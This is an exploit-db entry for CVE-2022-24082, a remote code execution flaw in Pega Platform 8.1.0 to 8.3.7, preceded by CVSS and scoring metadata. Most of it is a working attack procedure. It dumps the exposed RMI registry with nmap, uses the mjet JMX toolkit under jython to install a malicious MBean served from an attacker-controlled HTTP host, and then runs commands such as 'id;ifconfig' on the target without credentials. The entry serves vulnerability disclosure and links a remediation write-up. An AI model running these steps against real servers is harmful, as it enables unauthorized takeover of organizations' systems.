Pega Platform 8.1.0 - Remote Code Execution (RCE)

2023-03-2800:00:00

Marcin Wolak

www.exploit-db.com

104

pega platform

remote code execution

mogwai labs jmx

exploitation toolkit

cve-2022-24082

red hat enterprise

rmi registry

jvm

jython

command execution

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.016 Low

EPSS

Percentile

87.3%

JSON

# Exploit Title: Pega Platform 8.1.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 20 Oct 2022
# Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit)
# Vendor Homepage: www.pega.com
# Software Link: Not Available
# Version: 8.1.0 on-premise and higher, up to 8.3.7
# Tested on: Red Hat Enterprise 7
# CVE : CVE-2022-24082

;Dumping RMI registry:
nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address>

;Extracting dynamic TCP port number from the dump (in form of @127.0.0.1
:<PORT>)
;Verifying that the <PORT> is indeed open (it gives 127.0.0.1 in the RMI
dump, but actually listens on the network as well):
nmap -sT -sV -p <PORT> <IP Address>

;Exploitation requires:
;- JVM
;- MOGWAI LABS JMX Exploitation Toolkit (https://github.com/mogwailabs/mjet)
;- jython
;Installing mbean for remote code execution
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP
Address> 9999 install random_password http://<Local IP to Serve Payload
over HTTP>:6666 6666

;Execution of commands id & ifconfig
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP
Address> 9999 command random_password "id;ifconfig"

;More details:
https://medium.com/@Marcin-Wolak/cve-2022-24082-rce-in-the-pega-platform-discovery-remediation-technical-details-long-live-69efb5437316


Kind Regards,
Marcin Wolak